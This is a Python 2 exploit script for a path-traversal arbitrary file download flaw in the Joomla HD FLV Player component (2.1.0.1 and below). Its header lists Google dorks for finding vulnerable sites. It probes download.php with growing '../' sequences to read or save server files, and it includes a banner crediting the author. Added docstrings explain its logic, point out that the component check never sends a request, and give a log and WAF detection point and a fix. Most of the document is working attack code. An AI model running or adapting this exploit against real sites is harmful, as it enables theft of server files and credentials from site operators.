
Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability



    #!/usr/bin/env python
    #
    # Exploit Title :  Joomla HD FLV 2.1.0.1 and below Arbitrary File Download Vulnerability
    #
    # Exploit Author : Mr.XSecr3t
    #
    # Vendor Homepage : http://www.hdflvplayer.net/
    #
    # Software Link : http://www.hdflvplayer.net/download_count.php?pid=5
    #
    # Dork google 1:  inurl:/component/hdflvplayer/
    # Dork google 2:  inurl:com_hdflvplayer   
    #
    # Date : 2016-1-2
    #
    # Tested on : BackBox 3.x/4.x
    #
    # Info:
    #       Url: http://target/components/com_hdflvplayer/hdflvplayer/download.php?f=
    #       The variable "f" is not sanitized.
    #       Over 80.000 downloads (statistic reported on official site)
    #
    #
    # Video Demo : https://www.youtube.com/78c6d77dfXg
    #
    #
    # Http connection
    import urllib, urllib2
    # String manipulation
    import re
    # Time management
    import time
    # Args management
    import optparse
    # Error management
    import sys
    
    # ASCII-art banner shown before the usage text and at the start of every run.
    # It is a regular (non-raw) triple-quoted string, so the doubled backslashes
    # are escapes for a single backslash; the lone "\:" on the FLV line is not a
    # recognised escape and is kept literally by Python 2 (newer Python 3
    # versions warn about it).
    banner = """
           _______                      __           ___ ___ ______
          |   _   .-----.-----.--------|  .---.-.   |   Y   |   _  \\
          |___|   |  _  |  _  |        |  |  _  |   |.  1   |.  |   \\
          |.  |   |_____|_____|__|__|__|__|___._|   |.  _   |.  |    \\
          |:  1   |                                 |:  |   |:  1    /
          |::.. . |                                 |::.|:. |::.. . /
          `-------'                                 `--- ---`------'
           _______ ___     ___ ___     _______ __
          |   _   |   |   |   Y   |   |   _   |  .---.-.--.--.-----.----.
          |.  1___|.  |   |.  |   |   |.  1   |  |  _  |  |  |  -__|   _|
          |.  __) |.  |___|.  |   |   |.  ____|__|___._|___  |_____|__|
          |:  |   |:  1   |:  1   |   |:  |            |_____|
          |::.|   |::.. . |\:.. ./    |::.|
          `---'   `-------' `---'     `---'

                                            <= 2.1.0.1 Remote File Download

                                   Written by:

                                    Mr.XSecr3t

                        https://www.facebook.com/vaniatufik

                                 ICDT@grupcyber.com
                             anonn404notfound@gmail.com

              https://www.facebook.com/groups/IndonesianCyberDarkNetTeam
    """
    
    # Check url
    def checkurl(url):
        """Return *url* unchanged when it carries an http:// or https:// scheme.

        Any other value prints an error and terminates the process with
        exit status 1. Only the prefix is inspected; no network access and no
        further URL validation (host, port, trailing slash) happens here.
        """
        if url.startswith(("http://", "https://")):
            return url
        print('[X] You must insert http:// or https:// procotol')
        sys.exit(1)
    
    
    def checkcomponent(url,headers):
        """Print whether the HD FLV component path appears to exist on *url*.

        Only a ``urllib2.Request`` object is built; ``urlopen()`` is never
        called, so nothing is sent to the server. Because ``Request()`` does not
        open a connection, the ``HTTPError`` branch cannot fire and the function
        always reports FOUND -- the result carries no information about the
        target.
        """

        try:
            # Constructs the request for the component's download.php but never issues it.
            req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php', None, headers)
            sys.stdout.write("\r[+] Searching HD FLV Extension...: FOUND")
            print("")
        except urllib2.HTTPError:
            # Unreachable: no network call is made above.
            sys.stdout.write("\r[+] Searching HD FLV Extension...: Not FOUND :(")
            sys.exit(1)
        except urllib2.URLError:
            print '[X] Connection Error'
    
    def checkversion(url,headers):
        """Print the version string advertised by the module's manifest XML.

        Issues one GET for ``/modules/mod_hdflvplayer/mod_hdflvplayer.xml`` with
        the given *headers* and, for every line containing ``<version>``, prints
        the text between the first ``>`` and ``<`` on that line. An HTTP error
        prints "Unknown" and returns normally, so the caller proceeds regardless
        of the version; a connection failure exits with status 1.
        """

        try:
            req = urllib2.Request(url+'/modules/mod_hdflvplayer/mod_hdflvplayer.xml', None, headers)
            response = urllib2.urlopen(req).readlines()

            for line_version in response:

                if not line_version.find("<version>") == -1:

                    # Takes the first '>...<' span on the line; only yields the
                    # version when the tag and its text share a single line.
                    VER = re.compile('>(.*?)<').search(line_version).group(1)

                    sys.stdout.write("\r[+] Checking Version: "+str(VER))
            print("")

        except urllib2.HTTPError:
           # No newline is written here; the caller's next "\r" status line overwrites it.
           sys.stdout.write("\r[+] Checking Version: Unknown")

        except urllib2.URLError:
            print("\n[X] Connection Error")
            sys.exit(1)
    
    def connection(url,headers,pathtrav):
        """Probe download.php with an increasing ``../`` prefix in front of *pathtrav*.

        Up to 19 GET requests are sent, one per loop iteration, each with one
        more ``../`` prepended to *pathtrav* in the ``f`` parameter and a one
        second pause afterwards. A response is treated as a hit when its body is
        non-empty and does not contain the PHP warning text
        ``failed to open stream``. On a hit the user is asked to either save the
        body to a file (``d``) or print it (``r``); both paths return ``True``.
        If no iteration hits, a message is printed and ``None`` is returned.

        Python 2 only (``raw_input``, print statements).

        NOTE(review): from the server side this shows up as a burst of requests
        to the same download.php path whose ``f`` value starts with repeated
        ``../`` segments, roughly one per second -- that pattern in web-server
        logs or a WAF rule is the straightforward detection point, and the fix
        is for download.php to reject any ``f`` value that resolves outside its
        intended directory.
        """

        char = "../"
        bar = "#"
        s = ""
        barcount = ""

        # range(1,20): 19 attempts, so the traversal depth goes from 1 to 19.
        for a in range(1,20):

            s += char
            barcount += bar
            sys.stdout.write("\r[+] Exploiting...please wait: "+barcount)
            sys.stdout.flush()

            try:
                req = urllib2.Request(url+'/components/com_hdflvplayer/hdflvplayer/download.php?f='+s+pathtrav, None, headers)
                response = urllib2.urlopen(req)

                content = response.read()

                # Empty bodies and PHP's "failed to open stream" warning count as misses.
                if content != "" and not "failed to open stream" in content:
                    print("\n[!] VULNERABLE")
                    print("[*] 3v1l Url: "+url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav)
                    print("")
                    print("[+] Mau Didownload apa di Read Cuk?")
                    print("[+]")
                    sys.stdout.write("\r[+] Mau Didownload apa di Read Cuk?: ")

                    download = set(['d'])
                    read  = set(['r'])

                    # Interactive prompt; loops until 'd' or 'r' is entered.
                    while True:
                        choice = raw_input().lower()
                        if choice in download:
                            # Re-fetches the same URL and writes it to the current
                            # directory under the last path segment of pathtrav.
                            filedown = pathtrav.split('/')[-1]
                            urllib.urlretrieve (url+"/components/com_hdflvplayer/hdflvplayer/download.php?f="+s+pathtrav, filedown)
                            print("[!] Sip Deh KeDownload!")
                            print("[!] Check file: "+filedown)
                            return True
                        elif choice in read:
                            print("")
                            print content
                            return True
                        else:
                            sys.stdout.write("\r[X] lease respond with 'D' or 'R': ")

            except urllib2.HTTPError:
                # HTTP error statuses are treated as a miss for this depth.
                #print '[X] HTTP Error'
                pass
            except urllib2.URLError:
                # Connection failures are reported but the loop keeps going.
                print '\n[X] Connection Error'

            time.sleep(1)
        print("\n[X] Filenya ga ketemu Cuk -_- :(")
    
    # Command-line handling: both -t/--target and -f/--file are required.
    commandList = optparse.OptionParser('usage: %prog -t URL -f FILENAME')
    commandList.add_option('-t', '--target', action="store",
                      help="Insert TARGET URL: http[s]://www.victim.com[:PORT]",
                      )
    commandList.add_option('-f', '--file', action="store",
                      help="Insert file to check",
                      )
    options, remainder = commandList.parse_args()

    # Check args
    if not options.target or not options.file:
        print(banner)
        commandList.print_help()
        sys.exit(1)

    print(banner)

    # checkurl only verifies the scheme prefix; a target ending in "/" would
    # produce "//" in every path built below (not normalised here).
    url = checkurl(options.target)
    pathtrav = options.file

    # Fixed browser-like User-Agent sent with every request; the tool does not
    # otherwise identify itself.
    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'}

    # Stages run in sequence: component check (never actually sends a request),
    # version check (continues even when unknown), then the traversal probes.
    sys.stdout.write("\r[+] Searching HD FLV Extension...: ")
    checkcomponent(url,headers)
    sys.stdout.write("\r[+] Checking Version: ")
    checkversion(url,headers)
    sys.stdout.write("\r[+] Exploiting...please wait:")
    connection(url,headers,pathtrav)
